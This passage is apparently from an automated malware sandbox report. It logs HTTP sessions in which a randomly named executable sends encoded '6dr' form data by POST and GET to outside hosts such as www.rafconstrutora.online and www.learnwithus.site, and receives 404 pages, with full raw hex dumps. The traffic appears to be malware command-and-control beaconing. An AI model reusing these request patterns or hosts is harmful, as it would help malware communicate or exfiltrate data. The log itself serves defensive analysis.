                                                                Data Ascii: 6dr=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF041FeuYL1ySAlJuaiSwHNEv17P1jM+Wr0fBqxWY9ol9z/GLVsnro5FG32fSMMKnMvMdW9YmYwyl7GfBagfysESxJyjr6EBGgktMVRGpBe7oMjn5QsWMKM8Q97BbFrUtMmsGI31LgtXJMrdbLhkRcT323emvmDHfQH5JtkJ0tCFjKdNOruVI+q65uUCvRVvzUwC/uzgangE2nvzQx7yUzukA//rjXs7MQ1Vjpg+6bQHCA/OxiXJ6gr5ZTTVJUIpgpzRv1ET0DqgvgRugkxuhGS/tVuakePSo1OfE3Okfgq3+7ygG20DhrfliefFHFKOGygsj4A4156vzRe69yF0gXra9ULWaebuy8q7rKd7sqXrmt7IjKG5Gu6h+TmBmV3pdcQnVF/+49rJGOtU3msVfi6pY36qeQ1BpYiVvUws3VG4756SqLZSPyev0E8jzwC6T08LU5FSFQUOLASQKd4hBc/K9w2dEYMFFLtPItp2lCO4Dclp82/kPpw2uZrrt5iZ7RBp2q8KKcmZpvIy/y9mnprYCXPu4WfPnrUVWLheDPzykDDo8v95acMaEH01Hb8PyrwQYKIACgmhho/R5LxniFzvNvp8zu/Erv7jpqBdeafFuQIvHaN3w6XPssllml3kKATZV1wkLX9abMF9zwipRBe/XsmGRsqyUDhQL3h1w/Yni3RwLu0ld7zXJ+3pRDRCSVIJitS8UfiszCdSgribACtP8nXGL9LRg+xMvtzUmQ/Wg9XO0LshxCIOgttQJU+o5bpJMmYU5uYq1ZdZuxuTMyYOAGl7qg2Ov8GnAZ2Lubd9BA9+rcoLbY2rwKwOTcY4yqw95F4APPdKNOgouHUEeYcCQceZzUCaj7alGJvNsx8u7I4ONb2KS46Ttaxov7akBSmiaG/HwnU9RXrsSEvLKZYB7LmzvyJILeGzFbmLvpq5BKT4YN24Wy1yxy0SXqpRbmiqc2c0UU [TRUNCATED]
                                                                Nov 27, 2024 08:56:16.166023970 CET533INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:15 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.650022209.74.77.107804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:17.466828108 CET502OUTGET /alu5/?Kp=6N8LUn6pGPW&6dr=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:18.770761967 CET548INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:18 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.650023104.21.34.103804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:32.873037100 CET782OUTPOST /1jao/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Origin: http://www.rafconstrutora.online
                                                                Referer: http://www.rafconstrutora.online/1jao/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 39 56 32 69 47 6c 47 39 33 38 77 42 4a 54 49 35 61 6a 65 54 4a 58 46 63 39 38 61 65 63 4a 71 30 68 6b 4b 42 50 69 34 49 6a 4b 4f 36 36 71 39 66 38 79 41 55 51 45 71 2f 48 68 4f 48 75 54 73 31 45 5a 51 76 49 68 76 72 30 62 4c 43 4d 4e 43 58 72 48 39 41 68 41 63 79 5a 75 7a 4f 65 6f 74 77 6a 5a 75 6b 45 33 4a 34 74 2b 48 6b 39 49 39 4d 45 30 36 47 43 4d 66 31 74 77 63 63 64 7a 4e 68 37 45 77 35 53 4d 4f 53 78 44 31 56 52 41 5a 43 57 54 65 6a 70 77 54 31 6a 58 35 2f 55 43 50 38 6c 70 38 67 45 59 6f 2f 59 4b 64 4e 32 38 6c 2b 34 37 32 70 4e 79 6f 68 70 62 4d 2b 6c 7a 78 41 50 4b 54 43 59 43 47 66 4b 65 55 41
                                                                Data Ascii: 6dr=9V2iGlG938wBJTI5ajeTJXFc98aecJq0hkKBPi4IjKO66q9f8yAUQEq/HhOHuTs1EZQvIhvr0bLCMNCXrH9AhAcyZuzOeotwjZukE3J4t+Hk9I9ME06GCMf1twccdzNh7Ew5SMOSxD1VRAZCWTejpwT1jX5/UCP8lp8gEYo/YKdN28l+472pNyohpbM+lzxAPKTCYCGfKeUA
                                                                Nov 27, 2024 08:56:34.006324053 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:33 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FudBy%2F2nHlDSqzVhDRlK9z5FjTpldXd3xeCquWeJTii5329YoqRKUDQ7q38J%2Bu7Q9qSuydJTp1gnGLGv4%2FDuJknMToK1VsvyDApNxAVHNA%2Bj0H84Kja1JgdNF3PajcgEm0BzfKaCC87R%2BmdC"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908ff71eae7cb1-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2
                                                                Nov 27, 2024 08:56:34.006381989 CET499INData Raw: 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1
                                                                Data Ascii: s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.650025104.21.34.103804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:35.538594961 CET806OUTPOST /1jao/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Origin: http://www.rafconstrutora.online
                                                                Referer: http://www.rafconstrutora.online/1jao/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 39 56 32 69 47 6c 47 39 33 38 77 42 62 68 63 35 4a 53 65 54 65 6e 46 66 2b 38 61 65 46 35 71 77 68 6b 47 42 50 6e 63 59 6a 38 2b 36 39 4f 35 66 39 7a 41 55 58 45 71 2f 4d 42 4f 47 74 6a 73 41 45 5a 56 51 49 6c 7a 72 30 62 33 43 4d 4d 79 58 72 77 70 50 6a 51 63 77 52 4f 7a 41 42 34 74 77 6a 5a 75 6b 45 7a 68 65 74 2b 76 6b 68 72 56 4d 43 56 36 48 4d 73 66 32 71 77 63 63 4c 44 4e 6c 37 45 78 63 53 4a 79 73 78 41 64 56 52 42 70 43 58 43 65 67 6e 41 54 73 6e 58 34 66 64 44 75 53 6e 76 38 6e 41 4f 41 74 5a 4e 46 4f 2b 71 34 6b 6b 49 32 4b 66 69 49 6a 70 5a 55 4d 6c 54 78 71 4e 4b 72 43 4b 56 4b 34 46 71 78 6a 55 5a 6e 6e 55 47 6e 37 72 2f 45 32 63 52 56 31 49 34 62 7a 34 51 3d 3d
                                                                Data Ascii: 6dr=9V2iGlG938wBbhc5JSeTenFf+8aeF5qwhkGBPncYj8+69O5f9zAUXEq/MBOGtjsAEZVQIlzr0b3CMMyXrwpPjQcwROzAB4twjZukEzhet+vkhrVMCV6HMsf2qwccLDNl7ExcSJysxAdVRBpCXCegnATsnX4fdDuSnv8nAOAtZNFO+q4kkI2KfiIjpZUMlTxqNKrCKVK4FqxjUZnnUGn7r/E2cRV1I4bz4Q==
                                                                Nov 27, 2024 08:56:36.721002102 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:36 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHXe%2F5nuGHGKHSl%2BPfc8XD8YM6jkH1NcdYQsI3k3fCAqTjnDWD0UH0DxMifz%2Beawk59vkNbrMhvQb%2Bjaq90w2c2vWR%2BvesY7YYwlo0iZfJ3Ub7KNz886Ujh5tnUsIsSbGauL2kJjkeGoappk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e90900809f56a52-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2217&rtt_var=1108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                                                                Nov 27, 2024 08:56:36.721071959 CET502INData Raw: 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce
                                                                Data Ascii: 2s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wV


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.650026104.21.34.103804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:38.205075979 CET1819OUTPOST /1jao/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Origin: http://www.rafconstrutora.online
                                                                Referer: http://www.rafconstrutora.online/1jao/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 39 56 32 69 47 6c 47 39 33 38 77 42 62 68 63 35 4a 53 65 54 65 6e 46 66 2b 38 61 65 46 35 71 77 68 6b 47 42 50 6e 63 59 6a 38 32 36 36 37 74 66 38 51 59 55 57 45 71 2f 46 68 4f 44 74 6a 73 6e 45 5a 74 55 49 6c 2f 56 30 65 7a 43 4f 75 36 58 6a 68 70 50 71 51 63 77 4f 2b 7a 4e 65 6f 74 68 6a 5a 2b 67 45 33 46 65 74 2b 76 6b 68 74 70 4d 42 45 36 48 42 4d 66 31 74 77 63 6d 64 7a 4e 64 37 45 35 71 53 49 6a 5a 78 51 39 56 52 68 35 43 51 30 71 67 6c 67 54 75 69 58 34 39 64 44 69 52 6e 76 4a 65 41 4b 41 48 5a 4b 31 4f 76 2b 4e 65 32 70 48 55 64 54 73 5a 31 4c 55 6f 68 54 31 62 4b 70 4b 37 61 30 2b 31 62 4c 49 55 51 38 72 51 41 33 32 69 74 2b 45 32 59 47 6f 70 49 6f 53 73 6a 30 6b 62 2f 30 50 76 66 58 31 71 4c 61 47 51 4e 35 78 54 58 63 6f 6a 2b 45 51 74 6e 67 59 49 30 41 6e 42 30 4e 67 4d 42 72 70 59 30 47 67 37 57 43 54 79 35 2b 45 6b 67 46 63 68 30 4d 6d 4d 61 51 76 76 6e 37 4a 62 72 50 67 36 50 38 36 46 5a 34 4e 4b 52 6c 59 68 43 31 30 63 44 70 2b 7a 59 64 4e 55 4f 4f 49 64 6e 59 55 59 33 66 [TRUNCATED]
                                                                Data Ascii: 6dr=9V2iGlG938wBbhc5JSeTenFf+8aeF5qwhkGBPncYj82667tf8QYUWEq/FhODtjsnEZtUIl/V0ezCOu6XjhpPqQcwO+zNeothjZ+gE3Fet+vkhtpMBE6HBMf1twcmdzNd7E5qSIjZxQ9VRh5CQ0qglgTuiX49dDiRnvJeAKAHZK1Ov+Ne2pHUdTsZ1LUohT1bKpK7a0+1bLIUQ8rQA32it+E2YGopIoSsj0kb/0PvfX1qLaGQN5xTXcoj+EQtngYI0AnB0NgMBrpY0Gg7WCTy5+EkgFch0MmMaQvvn7JbrPg6P86FZ4NKRlYhC10cDp+zYdNUOOIdnYUY3fB0wHPIh6cSqL4siYrD2PRXn8LWdhl2OFtZ8GqrX3SxSX0AKJ/lUw/WxW7qgV16+6y/iPW9iQCiQuLh0/5/8w2Qvo2orKj5LXH7Qr7XT1LKZ+F+4Vb6O5XljYTWkDVoqG+F/w6Q4I+mggZEtJSih5bW0kI4egGK1v9pQwhw2p1gvSxIiDMvUkg4PM8eRUnww+C2OmRYAyGpe0X0lviHXWx2ffNN9ExhewxSrWIkkSLoDW3F2jfkKdCoLzNgfrbMuXZmwj/3gg8ELYuHG41/xyWIOhk0EECC+4H0jLYxwnlRJarl/D+T6dDhs3u0ek6/hoNRtAfIEKcFOaLvbdPboo025kyy69+6GgoQzhAkq3sUe741vW3MeN7RpSxhk/qkQ6A02Oty0Lnn/pwzNMMMir1rlahI5NvTinYErh+4nxvkCTdl5p+Tx6smVSxXkCwc1uLUKvIxrCXksnVE5wdfbn2MokaX17OZZODMeCdtba4Z4+6sCJu7l1k2BLJc5bzwzGjXv8+vxWNsho52hpQw4/mvaHHSOvMfL0hkXucKf389J8jPebnN3Mgdsj5iDrvu44juAnycrJm8OAcBfdiMfP9yk7JlFDnoZUsHSEkQAHkmlphy9AvukgIUJ2FYTRaIyI2hzy4c6/mtsBybwliEkt0PutI23TuNpYM8 [TRUNCATED]
                                                                Nov 27, 2024 08:56:39.338416100 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:39 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV2IaYCpixNYe3mqFXVSM%2FO3eeGrybftA0%2BMR9pMF%2B8hVEy%2FeYIPqVj7JxraMj1NX99bne%2Bo6RAoWNHsXYxOhC9uJ12VFoaVXIOh27%2FFc4eJLywhD1qmAK1bnIff%2BijPwZXeF6dSdEhMTsd6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e9090187d9b4380-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1819&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                Data Ascii: 34bnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-
                                                                Nov 27, 2024 08:56:39.338449955 CET474INData Raw: 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72
                                                                Data Ascii: F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tdd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.650027104.21.34.103804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:40.873210907 CET507OUTGET /1jao/?6dr=wXeCFQWa9OsffQZ2WhWSf1ZyxcnJa4mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM03IMcNL7coNMrr+HJhleldbbhLhSE02VC7Ooq1hKOjwi60t3Eow=&Kp=6N8LUn6pGPW HTTP/1.1
